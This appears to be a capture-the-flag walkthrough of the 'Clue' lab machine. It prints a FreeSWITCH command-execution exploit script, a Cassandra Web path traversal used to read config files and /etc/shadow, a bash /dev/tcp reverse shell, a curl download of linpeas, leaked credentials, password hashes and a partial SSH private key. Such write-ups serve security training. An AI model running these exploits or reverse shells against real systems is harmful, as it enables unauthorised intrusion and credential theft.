Clue

Enumeration:

Port Scanning:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Clue]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 192.168.209.240
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-09 11:37 EST
Nmap scan report for 192.168.209.240                                                                                                                                       
Host is up, received echo-reply ttl 61 (0.22s latency).                                                                                                                    
Scanned at 2025-11-09 11:37:01 EST for 102s                                          
Not shown: 65529 filtered tcp ports (no-response)                                    
PORT     STATE SERVICE          REASON         VERSION                               
22/tcp   open  ssh              syn-ack ttl 61 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)                                                                              
| ssh-hostkey:                            
|   2048 74:ba:20:23:89:92:62:02:9f:e7:3d:3b:83:d4:d9:6c (RSA)                       
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDGGcX/x/M6J7Y0V8EeUt0FqceuxieEOe2fUH2RsY3XiSxByQWNQi+XSrFElrfjdR2sgnauIWWhWibfD+kTmSP5gkFcaoSsLtgfMP/2G8yuxPSev+9o1N18gZchJneakItNT
az1ltG1W//qJPZDHmkDneyv798f9ZdXBzidtR5/+2ArZd64bldUxx0irH0lNcf+ICuVlhOZyXGvSx/ceMCRozZrW2JQU+WLvs49gC78zZgvN+wrAZ/3s8gKPOIPobN3ObVSkZ+zngt0Xg/Zl11LLAbyWX7TupAt6lTYOvCSwNVZ
URyB1dDdjlMAXqT/Ncr4LbP+tvsiI1BKlqxx4I2r
|   256 54:8f:79:55:5a:b0:3a:69:5a:d5:72:39:64:fd:07:4e (ECDSA)                      
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCpAb2jUKovAahxmPX9l95Pq9YWgXfIgDJw0obIpOjOkdP3b0ukm/mrTNgX2lg1mQBMlS3lzmQmxeyHGg9+xuJA=
|   256 7f:5d:10:27:62:ba:75:e9:bc:c8:4f:e2:72:87:d4:e2 (ED25519)                    
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIE0omUJRIaMtPNYa4CKBC+XUzVyZsJ1QwsksjpA/6Ml+   
80/tcp   open  http             syn-ack ttl 61 Apache httpd 2.4.38                   
| http-methods:                           
|_  Supported Methods: POST OPTIONS HEAD GET                                         
|_http-title: 403 Forbidden                                                          
|_http-server-header: Apache/2.4.38 (Debian)                                         
139/tcp  open  netbios-ssn      syn-ack ttl 61 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)                                               
445/tcp  open  netbios-ssn      syn-ack ttl 61 Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)                                                                              
3000/tcp open  http             syn-ack ttl 61 Thin httpd
|_http-title: Cassandra Web                                                          
|_http-favicon: Unknown favicon MD5: 68089FD7828CD453456756FE6E7C4FD8
| http-methods:                                                                      
|_  Supported Methods: GET HEAD                                                                                                                                            
|_http-server-header: thin
8021/tcp open  freeswitch-event syn-ack ttl 61 FreeSWITCH mod_event_socket
Service Info: Hosts: 127.0.0.1, CLUE; OS: Linux; CPE: cpe:/o:linux:linux_kernel

<snipped>

HTTP (80):

If we browsed to this, we will get forbidden:

SMB (445):

List the shares and permissions if we have one:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Clue]
└─$ nxc smb 192.168.209.240 -u '' -p '' --shares
SMB         192.168.209.240 445    CLUE             [*] Unix - Samba (name:CLUE) (domain:pg) (signing:False) (SMBv1:True)
SMB         192.168.209.240 445    CLUE             [+] pg\:
SMB         192.168.209.240 445    CLUE             [*] Enumerated shares
SMB         192.168.209.240 445    CLUE             Share           Permissions     Remark
SMB         192.168.209.240 445    CLUE             -----           -----------     ------
SMB         192.168.209.240 445    CLUE             print$                          Printer Drivers
SMB         192.168.209.240 445    CLUE             backup          READ            Backup web directory shares
SMB         192.168.209.240 445    CLUE             IPC$                            IPC Service (Samba 4.9.5-Debian)

Lets skip this for not.

HTTP (3000):

Here we have cassandra running on port 3000.

HTTP (8021):

Nmap shows that we have freeswitch running on that port, lets search for public exploits:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Clue]                                                                                                                      
└─$ searchsploit freeswitch                                                                                                                                                
----------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                           |  Path                           
----------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
FreeSWITCH - Event Socket Command Execution (Metasploit)                                                                                 | multiple/remote/47698.rb        
FreeSWITCH 1.10.1 - Command Execution                                                                                                    | windows/remote/47799.txt        
----------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

We will have one:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Clue]
└─$ searchsploit -m windows/remote/47799.txt
  Exploit: FreeSWITCH 1.10.1 - Command Execution
      URL: https://www.exploit-db.com/exploits/47799
     Path: /usr/share/exploitdb/exploits/windows/remote/47799.txt
    Codes: N/A
 Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/kali/Desktop/CTF/Machines/OffsecPG/Practice/Clue/47799.txt

Try to run it:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Clue]
└─$ cat 47799.txt         
# Exploit Title: FreeSWITCH 1.10.1 - Command Execution
# Date: 2019-12-19
# Exploit Author: 1F98D
# Vendor Homepage: https://freeswitch.com/ 
# Software Link: https://files.freeswitch.org/windows/installer/x64/FreeSWITCH-1.10.1-Release-x64.msi
# Version: 1.10.1
# Tested on: Windows 10 (x64)
#
# FreeSWITCH listens on port 8021 by default and will accept and run commands sent to 
# it after authenticating. By default commands are not accepted from remote hosts.
#
# -- Example --
# root@kali:~# ./freeswitch-exploit.py 192.168.1.100 whoami
# Authenticated
# Content-Type: api/response
# Content-Length: 20
#
# nt authority\system
#

#!/usr/bin/python3

from socket import *
import sys

if len(sys.argv) != 3:
    print('Missing arguments')
    print('Usage: freeswitch-exploit.py <target> <cmd>')
    sys.exit(1)

ADDRESS=sys.argv[1]
CMD=sys.argv[2]
PASSWORD='ClueCon' # default password for FreeSWITCH

s=socket(AF_INET, SOCK_STREAM)
s.connect((ADDRESS, 8021))

response = s.recv(1024)
if b'auth/request' in response:
    s.send(bytes('auth {}\n\n'.format(PASSWORD), 'utf8'))
    response = s.recv(1024)
    if b'+OK accepted' in response:
        print('Authenticated')
        s.send(bytes('api system {}\n\n'.format(CMD), 'utf8'))
        response = s.recv(8096).decode()
        print(response)
    else:
        print('Authentication failed')
        sys.exit(1)
else:
    print('Not prompted for authentication, likely not vulnerable')
    sys.exit(1)
    
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Clue]
└─$ mv 47799.txt exploit.py

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Clue]
└─$ python3 exploit.py 192.168.209.240   
Missing arguments
Usage: freeswitch-exploit.py <target> <cmd>

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Clue]
└─$ python3 exploit.py 192.168.209.240 whoami
Authentication failed

Try it manually.

First we will grab the default password for freeswitch from the script and connect to the port with nc:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Clue]
└─$ nc -nv 192.168.209.240 8021
(UNKNOWN) [192.168.209.240] 8021 (zope-ftp) open
Content-Type: auth/request

auth ClueCon

Content-Type: command/reply
Reply-Text: -ERR invalid

Content-Type: text/disconnect-notice
Content-Length: 67

Disconnected, goodbye.
See you at ClueCon! http://www.cluecon.com/

Invalid credentials, so we need to get the correct password for us to be able to get code execution on the target.

Exploitation:

Going back to cassandra, I searched online for CVEs, and found one:

We have path traversal vulnerability.

Cassandra Web 0.5.0 - Remote File ReadExploit Database

Pull this with searchsploit:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Clue]
└─$ searchsploit -m 49362
  Exploit: Cassandra Web 0.5.0 - Remote File Read
      URL: https://www.exploit-db.com/exploits/49362
     Path: /usr/share/exploitdb/exploits/linux/webapps/49362.py
    Codes: N/A
 Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/kali/Desktop/CTF/Machines/OffsecPG/Practice/Clue/49362.py

Run it:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Clue]
└─$ python3 49362.py -h
usage: 49362.py [-h] [-p PORT] [-f] [-n NUMBER] target file

positional arguments:
  target               Cassandra Web Host
  file                 eg. /etc/passwd, /proc/sched_debug + /proc/<cass-web-pid>/cmdline

options:
  -h, --help           show this help message and exit
  -p, --port PORT      Cassandra Web Port
  -f, --force          Run the payload even if server isn't Cassandra Web
  -n, --number NUMBER  Adjust the number of dot-dot-slash
  
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Clue]
└─$ python3 49362.py 192.168.209.240 /etc/passwd                                      

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin 
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
ntp:x:106:113::/nonexistent:/usr/sbin/nologin
cassandra:x:107:114:Cassandra database,,,:/var/lib/cassandra:/usr/sbin/nologin
cassie:x:1000:1000::/home/cassie:/bin/bash 
freeswitch:x:998:998:FreeSWITCH:/var/lib/freeswitch:/bin/false
anthony:x:1001:1001::/home/anthony:/bin/bash

This time I get stuck with that path traversal vulnerability, because I do not what exactly the files resides on that system, so skip this also for a moment.

Lets step back to our smb backup share, and connect to it:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Clue]
└─$ mkdir backup

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Clue]
└─$ cd backup

┌──(kali㉿kali)-[~/…/OffsecPG/Practice/Clue/backup]
└─$ smbclient -N //192.168.209.240/backup
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Aug  5 04:43:50 2022
  ..                                  D        0  Fri Aug  5 04:43:44 2022
  freeswitch                          D        0  Fri Aug  5 04:43:51 2022
  cassandra                           D        0  Fri May  6 11:04:47 2022

                14343176 blocks of size 1024. 10598380 blocks available

We can get the files with mget, or by mounting the share in our kali:

smb: \> prompt off
smb: \> recurse on
smb: \> mget *
getting file \freeswitch\usr\bin\tone2wav of size 14512 as freeswitch/usr/bin/tone2wav (18.5 KiloBytes/sec) (average 18.5 KiloBytes/sec)
getting file \freeswitch\usr\bin\fs_ivrd of size 68320 as freeswitch/usr/bin/fs_ivrd (51.0 KiloBytes/sec) (average 39.1 KiloBytes/sec)
getting file \freeswitch\usr\bin\fs_cli of size 98624 as freeswitch/usr/bin/fs_cli (66.9 KiloBytes/sec) (average 50.5 KiloBytes/sec)
<snipped>

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Clue]
└─$ sudo mount -t cifs //192.168.209.240/backup backup/ -o guest

┌──(kali㉿kali)-[~/…/OffsecPG/Practice/Clue/backup]
└─$ ls
cassandra  freeswitch

From here I searched for passwords, and found only ClueCon which is the default password, so lets grep for that word, and put the files this word is in, then use our path traversal to check if we can get another result (we can also download the github repo of this project and do the same if we did not have access to the source code this way):

┌──(kali㉿kali)-[~/…/OffsecPG/Practice/Clue/backup]                                                                                                                        
└─$ grep 'ClueCon' freeswitch -nR 2>/dev/null                                                                                                                              
freeswitch/etc/freeswitch/ivr_menus/new_demo_ivr.xml:21:    <entry action="menu-sub"      digits="3" param="cluecon_ivr_submenu"/>               <!-- ClueCon sub menu --> 
freeswitch/etc/freeswitch/ivr_menus/new_demo_ivr.xml:54:  <!-- ClueCon IVR Sub Menu -->                                                                                    
freeswitch/etc/freeswitch/ivr_menus/demo_ivr.xml:25:    <entry action="menu-exec-app" digits="4" param="transfer 9191 XML default"/>    <!-- ClueCon -->                   
freeswitch/etc/freeswitch/dialplan/default.xml:713:    <extension name="ClueCon">                                                                                          
freeswitch/etc/freeswitch/dialplan/default.xml:715:        <action application="set" data="effective_caller_id_name=ClueCon IVR"/>                                         
freeswitch/etc/freeswitch/autoload_configs/event_socket.conf.xml:6:    <param name="password" value="ClueCon"/>                                                            
freeswitch/etc/freeswitch/autoload_configs/erlang_event.conf.xml:12:    <param name="cookie" value="ClueCon"/>                                                             
freeswitch/etc/freeswitch/autoload_configs/hash.conf.xml:4:     <!-- <remote name="Test1" host="10.0.0.10" port="8021" password="ClueCon" interval="1000" /> -->           
freeswitch/etc/freeswitch/autoload_configs/event_multicast.conf.xml:11:    <!-- <param name="psk" value="ClueCon"/> -->                                                    
freeswitch/etc/freeswitch/lang/es/demo/demo-ivr-es-MX.xml:44:        <!-- Menu option 4: Register for ClueCon -->                                                          
freeswitch/etc/freeswitch/lang/es/demo/demo-ivr-es-ES.xml:44:        <!-- Menu option 4: Register for ClueCon -->                                                          
freeswitch/etc/freeswitch/lang/en/demo/demo-ivr.xml:42:        <!-- Menu option 4: Register for ClueCon -->                                                                
freeswitch/etc/freeswitch/lang/en/demo/new-demo-ivr.xml:18:        <!-- Menu option 3: To hear about ClueCon -->                                                           
freeswitch/etc/freeswitch/lang/en/demo/new-demo-ivr.xml:49:        <!-- Menu option 3: To hear about ClueCon -->                                                           
freeswitch/etc/freeswitch/lang/en/demo/new-demo-ivr.xml:134:  <!-- More information about ClueCon -->                                                                      
freeswitch/etc/freeswitch/lang/en/demo/new-demo-ivr.xml:138:        <!-- Information about ClueCon... -->                                                                  
freeswitch/etc/freeswitch/lang/pt/demo/demo-ivr-pt-PT.xml:44:        <!-- Menu option 4: Register for ClueCon -->                                                          
freeswitch/etc/freeswitch/lang/pt/demo/demo-ivr-pt-BR.xml:44:        <!-- Menu option 4: Register for ClueCon -->                                                          
freeswitch/etc/freeswitch/lang/he/demo/demo-ivr.xml:42:        <!-- Menu option 4: Register for ClueCon -->

┌──(kali㉿kali)-[~/…/OffsecPG/Practice/Clue/backup]
└─$ grep 'ClueCon' freeswitch -nR 2>/dev/null | cut -d ':' -f 1 | sed 's|.*\(\/etc/.*\)|\1|'
/etc/freeswitch/ivr_menus/new_demo_ivr.xml 
/etc/freeswitch/ivr_menus/new_demo_ivr.xml 
/etc/freeswitch/ivr_menus/demo_ivr.xml
/etc/freeswitch/dialplan/default.xml
/etc/freeswitch/dialplan/default.xml
/etc/freeswitch/autoload_configs/event_socket.conf.xml
/etc/freeswitch/autoload_configs/erlang_event.conf.xml
/etc/freeswitch/autoload_configs/hash.conf.xml
/etc/freeswitch/autoload_configs/event_multicast.conf.xml
/etc/freeswitch/lang/es/demo/demo-ivr-es-MX.xml
/etc/freeswitch/lang/es/demo/demo-ivr-es-ES.xml
/etc/freeswitch/lang/en/demo/demo-ivr.xml
/etc/freeswitch/lang/en/demo/new-demo-ivr.xml
/etc/freeswitch/lang/en/demo/new-demo-ivr.xml
/etc/freeswitch/lang/en/demo/new-demo-ivr.xml
/etc/freeswitch/lang/en/demo/new-demo-ivr.xml
/etc/freeswitch/lang/pt/demo/demo-ivr-pt-PT.xml
/etc/freeswitch/lang/pt/demo/demo-ivr-pt-BR.xml
/etc/freeswitch/lang/he/demo/demo-ivr.xml

┌──(kali㉿kali)-[~/…/OffsecPG/Practice/Clue/backup]
└─$ grep 'ClueCon' freeswitch -nR 2>/dev/null | cut -d ':' -f 1 | sed 's|.*\(\/etc/.*\)|\1|' > brute.txt

Now the second step:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Clue]
└─$ for i in $(cat brute.txt); do python3 49362.py 192.168.209.240 $i; done

<snipped>

<configuration name="event_socket.conf" description="Socket Client">
  <settings>
    <param name="nat-map" value="false"/>
    <param name="listen-ip" value="0.0.0.0"/>
    <param name="listen-port" value="8021"/>
    <param name="password" value="StrongClueConEight021"/>
  </settings>
</configuration> 

<snipped>

Now lets test this password out again with our freeswitch application:

#!/usr/bin/python3

from socket import *
import sys

if len(sys.argv) != 3:
    print('Missing arguments')
    print('Usage: freeswitch-exploit.py <target> <cmd>')
    sys.exit(1)

ADDRESS=sys.argv[1]
CMD=sys.argv[2]
PASSWORD='StrongClueConEight021'

s=socket(AF_INET, SOCK_STREAM)
s.connect((ADDRESS, 8021))

response = s.recv(1024)
if b'auth/request' in response:
    s.send(bytes('auth {}\n\n'.format(PASSWORD), 'utf8'))
    response = s.recv(1024)
    if b'+OK accepted' in response:
        print('Authenticated')
        s.send(bytes('api system {}\n\n'.format(CMD), 'utf8'))
        response = s.recv(8096).decode()
        print(response)
    else:
        print('Authentication failed')
        sys.exit(1)
else:
    print('Not prompted for authentication, likely not vulnerable')
    sys.exit(1)

Run it:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Clue]
└─$ python3 exploit.py 192.168.209.240 whoami
Authenticated
Content-Type: api/response
Content-Length: 11

freeswitch

We successfully authenticated, and we have remote command execution.

Get a reverse shell:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Clue]
└─$ nc -nlvp 80
listening on [any] 80 ...

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Clue]
└─$ python3 exploit.py 192.168.209.240 'bash -c "bash -i >& /dev/tcp/192.168.45.187/80 0>&1"'
Authenticated

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Clue]                                                                                                                      
└─$ nc -nlvp 80                                                                                                                                                            
listening on [any] 80 ...                                                                                                                                                  
connect to [192.168.45.187] from (UNKNOWN) [192.168.209.240] 52678                                                                                                         
bash: cannot set terminal process group (533): Inappropriate ioctl for device                                                                                              
bash: no job control in this shell                                                                                                                                         
freeswitch@clue:/$ which python3
/usr/bin/python3
freeswitch@clue:/$ python3 -c 'import pty;pty.spawn("/bin/bash")'                                                                                                          
freeswitch@clue:/$ export TERM=xterm
freeswitch@clue:/$ ^Z                                                                                                                                                      
zsh: suspended  nc -nlvp 80                                                                                                                                                
                                                                                                                                                                           
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Clue]                                                                                                                      
└─$ stty -a                                                                                                                                                                
speed 38400 baud; rows 43; columns 171; line = 0;                                                                                                                          
<snipped>                                          
                                                                                                                                                                           
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Clue]                                                                                                                      
└─$ stty raw -echo ; fg                                                                                                                                                    
[1]  + continued  nc -nlvp 80                                                                                                                                              
                                                                                                                                                                           
freeswitch@clue:/$ stty rows 43 columns 171                                                                                                                                
freeswitch@clue:/$

Post Exploitation:

Lateral Movement to Cassie:

I uploaded linpeas and found this:

freeswitch@clue:/$ cd /dev/shm
freeswitch@clue:/dev/shm$ curl http://192.168.45.187/linpeas.sh -o linpeas.sh
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  949k  100  949k    0     0   823k      0  0:00:01  0:00:01 --:--:--  823k
freeswitch@clue:/dev/shm$ chmod +x linpeas.sh
freeswitch@clue:/dev/shm$ ./linpeas.sh

<snipped>

                ╔════════════════════════════════════════════════╗                                                                                                         
════════════════╣ Processes, Crons, Timers, Services and Sockets ╠════════════════                                                                                         
                ╚════════════════════════════════════════════════╝                                                                                                         
╔══════════╣ Running processes (cleaned)                                                                                                                                   
╚ Check weird & unexpected processes run by root: https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#processes                                
root         1  0.0  0.4 103860 10076 ?        Ss   11:33   0:00 /sbin/init
<snipped>
cassie     981  0.0  1.6 623504 34428 ?        Rsl  11:35   0:01 /usr/bin/ruby2.5 /usr/local/bin/cassandra-web -u cassie -p SecondBiteTheApple330
root      1355  0.0  1.0  48052 21708 ?        Ss   11:36   0:00 /usr/sbin/smbd --foreground --no-process-group
<snipped>

<snipped>

We can get the same result with ps aux.

freeswitch@clue:/dev/shm$ su cassie
Password: SecondBiteTheApple330
cassie@clue:/dev/shm$

Privilege Escalation to Root:

If we went back to our home directory we will find private key for anthony that is the second user on that system:

cassie@clue:/dev/shm$ cd                                                                                                                                                   
cassie@clue:~$ ls -la                                                                                                                                                      
total 36                                                                                                                                                                   
drwxr-xr-x 5 cassie cassie 4096 Nov  9 12:31 .                                                                                                                             
drwxr-xr-x 4 root   root   4096 Aug  5  2022 ..                                                                                                                            
lrwxrwxrwx 1 root   root      9 Aug  5  2022 .bash_history -> /dev/null                                                                                                    
-rw-r--r-- 1 cassie cassie  220 Apr 18  2019 .bash_logout                                                                                                                  
-rw-r--r-- 1 cassie cassie 3526 Apr 18  2019 .bashrc                                                                                                                       
drwx------ 3 cassie cassie 4096 Aug 11  2022 .gnupg                                                                                                                        
-rw------- 1 cassie cassie 1823 Aug 11  2022 id_rsa                                                                                                                        
drwxrwx--- 3 cassie cassie 4096 Nov  9 12:31 .local                                                                                                                        
-rw-r--r-- 1 cassie cassie  807 Apr 18  2019 .profile                                                                                                                      
drwx------ 2 cassie cassie 4096 Aug 11  2022 .ssh                                                                                                                          
cassie@clue:~$ cat id_rsa                                                                                                                                                  
-----BEGIN OPENSSH PRIVATE KEY-----                                                                                                                                        
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
<snipped>
-----END OPENSSH PRIVATE KEY-----
cassie@clue:~$ cat id_rsa  | grep -v '\-\-' | base64 -d | xxd
00000000: 6f70 656e 7373 682d 6b65 792d 7631 0000  openssh-key-v1..
00000010: 0000 046e 6f6e 6500 0000 046e 6f6e 6500  ...none....none.
00000020: 0000 0000 0000 0100 0001 1700 0000 0773  ...............s
<snipped>
000004f0: 9bf5 69e4 2759 2500 0000 0c61 6e74 686f  ..i.'Y%....antho
00000500: 6e79 4063 6c75 6501 0203 0405 0607       ny@clue.......
cassie@clue:~$ ls -la ../anthony/
total 28
drwxr-xr-x 3 anthony anthony 4096 Aug  5  2022 .
drwxr-xr-x 4 root    root    4096 Aug  5  2022 ..
-rw------- 1 anthony anthony  120 Aug  5  2022 .bash_history
-rw-r--r-- 1 anthony anthony  220 Apr 18  2019 .bash_logout
-rw-r--r-- 1 anthony anthony 3526 Apr 18  2019 .bashrc
-rw-r--r-- 1 anthony anthony  807 Apr 18  2019 .profile
drwx------ 2 anthony anthony 4096 Aug  5  2022 .ssh

I copied it to my local kali, and tried to authenticate as anthony but could not.

From the output above, we can see .bash_history file that has some values, but only anthony and root can read it.

cassie@clue:~$ sudo -l
Matching Defaults entries for cassie on clue:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User cassie may run the following commands on clue:
    (ALL) NOPASSWD: /usr/local/bin/cassandra-web
cassie@clue:~$ sudo /usr/local/bin/cassandra-web                                                                                                                           
I, [2025-11-09T12:39:07.010211 #25228]  INFO -- : Establishing control connection                                                                                          
W, [2025-11-09T12:39:07.012976 #25228]  WARN -- : Host 127.0.0.1 refused all connections                                                                                   
Cassandra::Errors::AuthenticationError: Server requested authentication, but client was not configured to authenticate                                                     
                                                                                                                                                                           
Usage: cassandra-web [options]                                                                                                                                             
    -B, --bind BIND                  ip:port or path for cassandra web to bind on (default: 0.0.0.0:3000)                                                                  
    -H, --hosts HOSTS                coma-separated list of cassandra hosts (default: 127.0.0.1)                                                                           
    -P, --port PORT                  integer port that cassandra is running on (default: 9042)                                                                             
    -L, --log-level LEVEL            log level (default: info)                                                                                                             
    -u, --username USER              username to use when connecting to cassandra                                                                                          
    -p, --password PASS              password to use when connecting to cassandra                                                                                          
    -C, --compression NAME           compression algorithm to use (lz4 or snappy)                                                                                          
        --server-cert PATH           server ceritificate pathname                                                                                                          
        --client-cert PATH           client ceritificate pathname                                                                                                          
        --private-key PATH           path to private key                                                                                                                   
        --passphrase SECRET          passphrase for the private key                                                                                                        
    -h, --help                       Show help

We can run another cassandra web service on a different port, but this time with sudo privileges, so if we exploited the same path traversal we previously did on port 3000, on our newly created port we can successfully for example view root files or that .bash_history file.

cassie@clue:~$ sudo cassandra-web -u cassie -p SecondBiteTheApple330 -B 1337
I, [2025-11-09T12:56:13.239712 #16117]  INFO -- : Establishing control connection
I, [2025-11-09T12:56:13.322105 #16117]  INFO -- : Refreshing connected host's metadata
I, [2025-11-09T12:56:13.325311 #16117]  INFO -- : Completed refreshing connected host's metadata
I, [2025-11-09T12:56:13.325918 #16117]  INFO -- : Refreshing peers metadata
I, [2025-11-09T12:56:13.326946 #16117]  INFO -- : Completed refreshing peers metadata
I, [2025-11-09T12:56:13.327004 #16117]  INFO -- : Refreshing schema
I, [2025-11-09T12:56:13.352410 #16117]  INFO -- : Schema refreshed
I, [2025-11-09T12:56:13.352466 #16117]  INFO -- : Control connection established
I, [2025-11-09T12:56:13.352763 #16117]  INFO -- : Creating session
I, [2025-11-09T12:56:13.445638 #16117]  INFO -- : Session created
2025-11-09 12:56:13 -0500 Thin web server (v1.8.1 codename Infinite Smoothie)
2025-11-09 12:56:13 -0500 Maximum connections set to 1024
2025-11-09 12:56:13 -0500 Listening on 0.0.0.0:1337, CTRL+C to stop

From another reverse shell, lets try to view some of the protected files:

cassie@clue:~$ curl localhost:1337/../../../../../../../../../etc/shadow --path-as-is
root:$6$kuXiAC8PIOY2uis9$LrTzlkYSlY485ZREBLW5iPSpNxamM38BL85BPmaIAWp05VlV.tdq0EryiFLbLryvbsGTx50dLnMsxIk7PJB5P1:19209:0:99999:7:::
daemon:*:18555:0:99999:7:::
bin:*:18555:0:99999:7:::
sys:*:18555:0:99999:7:::
sync:*:18555:0:99999:7:::
games:*:18555:0:99999:7:::
man:*:18555:0:99999:7:::
lp:*:18555:0:99999:7:::
mail:*:18555:0:99999:7:::
news:*:18555:0:99999:7:::
uucp:*:18555:0:99999:7:::
proxy:*:18555:0:99999:7:::
www-data:*:18555:0:99999:7:::
backup:*:18555:0:99999:7:::
list:*:18555:0:99999:7:::
irc:*:18555:0:99999:7:::
gnats:*:18555:0:99999:7:::
nobody:*:18555:0:99999:7:::
_apt:*:18555:0:99999:7:::
systemd-timesync:*:18555:0:99999:7:::
systemd-network:*:18555:0:99999:7:::
systemd-resolve:*:18555:0:99999:7:::
messagebus:*:18555:0:99999:7:::
sshd:*:18555:0:99999:7:::
systemd-coredump:!!:18555::::::
ntp:*:19209:0:99999:7:::
cassandra:!:19209:0:99999:7:::
cassie:$6$/WeFDwP1CNIN34/z$9woKSLSZhgHw1mX3ou90wnR.i5LHEfeyfHbxu7nYmaZILVrbhHrSeHNGqV0WesuQWGIL7DHEwHKOLK6UX79DI0:19209:0:99999:7:::
freeswitch:!:19209::::::
anthony:$6$01NV0gAhVLOnUHb0$byLv3N95fqVvhut9rbsrYOVzi8QseWfkFl7.VDQ.26a.0IkEVR2TDXoTv/KCMLjUOQZMMpkTUdC3WIyqSWQ.Y1:19209:0:99999:7:::

I could not view the id_rsa of the root user, or the root flag.

Lets view the .bash_history file:

cassie@clue:~$ curl localhost:1337/../../../../../../../../../home/anthony/.bash_history --path-as-is
clear
ls -la
ssh-keygen
cp .ssh/id_rsa.pub .ssh/authorized_keys
sudo cp .ssh/id_rsa.pub /root/.ssh/authorized_keys
exit

This shows that we were able the whole time to authenticate as root to the box with the id_rsa we found previsouly in cassie desktop.

Lets use it to ssh to the box:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Clue]                                                                                                                      
└─$ cat id_rsa                                                        
-----BEGIN OPENSSH PRIVATE KEY-----                                                  
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEAw59iC+ySJ9F/xWp8QVkvBva2nCFikZ0VT7hkhtAxujRRqKjhLKJe
d19FBjwkeSg+PevKIzrBVr0JQuEPJ1C9NCxRsp91xECMK3hGh/DBdfh1FrQACtS4oOdzdM
jWyB00P1JPdEM4ojwzPu0CcduuV0kVJDndtsDqAcLJr+Ls8zYo376zCyJuCCBonPVitr2m
B6KWILv/ajKwbgrNMZpQb8prHL3lRIVabjaSv0bITx1KMeyaya+K+Dz84Vu8uHNFJO0rhq
gBAGtUgBJNJWa9EZtwws9PtsLIOzyZYrQTOTq4+q/FFpAKfbsNdqUe445FkvPmryyx7If/
DaMoSYSPhwAAA8gc9JxpHPScaQAAAAdzc2gtcnNhAAABAQDDn2IL7JIn0X/FanxBWS8G9r
acIWKRnRVPuGSG0DG6NFGoqOEsol53X0UGPCR5KD4968ojOsFWvQlC4Q8nUL00LFGyn3XE
